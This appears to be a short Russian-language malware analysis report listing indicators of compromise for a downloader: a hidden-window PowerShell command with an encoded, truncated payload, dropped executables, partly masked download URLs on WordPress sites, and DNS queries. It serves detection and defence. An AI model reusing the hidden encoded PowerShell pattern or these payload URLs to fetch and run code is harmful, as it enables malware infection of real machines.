Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABXAGUAbgBxAG8AagBtAHgAPQAnAE0AbQB5AGMAegB2AHoAbgBjACcAOwAkAFkAbQBoAHYAcAB5AHIAcABzAG8AdgB5AG8AIAA9ACAAJwA0ADQAOQAnADsAJABMAG8AbwB3AGUAYwB0AGUAPQAnAEcAbABiAHAAbgB4AHUAbwBtAHAAbwB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1576
- %TEMP%\1163393.cvr
- %HOMEPATH%\449.exe
- %HOMEPATH%\449.exe
- 'th###oilap.vn':80
- 'pi####.ulm.ac.id':80
- '16#.#27.220.53':80
- 'je#####pulautidung.com':443
- http://th###oilap.vn/wp-content/EV/
- http://pi####.ulm.ac.id/wp-content/r4iio/
- http://16#.#27.220.53/wp-includes/YEQ4r/
- DNS ASK hg###ghting.com
- DNS ASK th###oilap.vn
- DNS ASK pi####.ulm.ac.id
- DNS ASK je#####pulautidung.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABXAGUAbgBxAG8AagBtAHgAPQAnAE0AbQB5AGMAegB2AHoAbgBjACcAOwAkAFkAbQBoAHYAcAB5AHIAcABzAG8AdgB5AG8AIAA9ACAAJwA0ADQAOQAnADsAJABMAG8AbwB3AGUAYwB0AGUAPQAnAEcAbABiAHAAbgB4AHUAbwBtAHAAbwB...' (со скрытым окном)